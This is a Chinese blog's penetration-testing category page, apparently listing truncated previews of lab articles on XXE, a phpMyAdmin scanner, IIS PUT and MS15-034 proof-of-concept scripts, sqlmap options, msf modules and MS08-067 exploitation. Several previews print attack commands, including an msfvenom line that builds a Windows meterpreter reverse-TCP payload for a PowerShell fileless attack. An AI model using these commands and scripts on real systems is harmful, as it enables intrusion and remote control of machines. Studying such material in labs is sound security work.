渗透测试
文章平均质量分 94
洋洋cc
代码审计,web安全,渗透测试
展开
-
XXE从0到1
XXE从0到11. XXE概述XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。下面我们主要介绍PHP语言下的XXE攻击.1.1 XML基础XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储。1.1.1文档结构XML文档结构包括...原创 2021-06-09 22:44:00 · 210 阅读 · 0 评论 -
phpmyadmin批量检测工具
#coding=utf-8import requestsurl = "dict.txt"print("phpmyadmin目录扫描器")filpath = "/phpMyAdmin/"with open(url,'r') as f: for line in f.readlines(): line = line.strip() r_url = "http://" + line + filpath r = requests.get(r_url).原创 2020-06-03 01:02:04 · 1084 阅读 · 0 评论 -
IP反查域名数据
渗透测试做信息收集时候,需要爬取同网站IP的其他站点,进行渗透代码是python3写的import requestsfrom bs4 import BeautifulSoupimport csvdef getHtml(url): try: headers = { "Use-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chro原创 2020-05-22 15:31:57 · 686 阅读 · 0 评论 -
iis put漏洞poc
# coding=utf-8import requests# proxy='127.0.0.1:8080' #本地代理# proxies={# 'http':'http://'+proxy, #http发送到127.0.0.1:8080# 'https':'https://'+proxy #https发送到127.0.0.1:8080# }url = "http://192.168.64.131:8001/"r = requests.options(url)resu原创 2020-05-23 11:16:57 · 770 阅读 · 0 评论 -
ms15_034漏洞poc脚本
ms15_034漏洞poc脚本环境python3编写的:# coding=utf-8import requestsurl = "http://192.168.64.129:8001/"r = requests.get(url)print(r.headers)remote_server = r.headers["Server"]if remote_server.find('IIS/7.5') or remote_server.find('IIS/8.0'): payload = {'H原创 2020-05-23 11:15:57 · 552 阅读 · 2 评论 -
sqlmap进阶
–level [1,2,3,4,5]:探测等级level 2:或测试cookie,进行自动破解level3:测试HTTP User-Agent,Referer等头部信息–is-dba:验证当前用户是否为管理员权限若为管理员,则结果为Ture;反之则为False–referer:HTTP Referer头当level为3或大于3时,会尝试referer注入,可以使用–referer伪造HTTP中的Referer,如:–referer http://www.baidu.com参数:–os-cmd原创 2020-05-10 21:13:12 · 434 阅读 · 0 评论 -
Powershell 配合msf无文件攻击
生成木马msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135LPORT=1121 -f psh-reflection >x.ps1放到VPS上,这里我们放到本机搭建的apache环境中kali设置监听,并且启动win7中访问木马是否成功直接在win7的cmd中执行命令powersh...原创 2020-04-27 12:48:15 · 1731 阅读 · 2 评论 -
msf常用模块
运行msfconsole 即可打开msf命令控制接口whois查询:msf > whois example.commsf> whois 192.168.1.100常用模块:查找模块:search 模块名称查看模块选项:options清除选项:unsetpostscan 端口扫描smb_version 模块(文件共享,端口号445)mssql_ping...原创 2020-04-24 10:08:20 · 3019 阅读 · 0 评论 -
ms08-067复现
nmap扫描系统存在的漏洞,扫描系统信息nmap --script=vuln 192.168.64.137检查是否存在常见漏洞nmap -O 检测系统版本启动msfconsole,search查找ms08-067攻击模块,并且使用设置payloadset payload windows/meterpreter/reverse_tcp直接run可以看到跳转到了meterpret...原创 2020-04-24 10:04:01 · 186 阅读 · 0 评论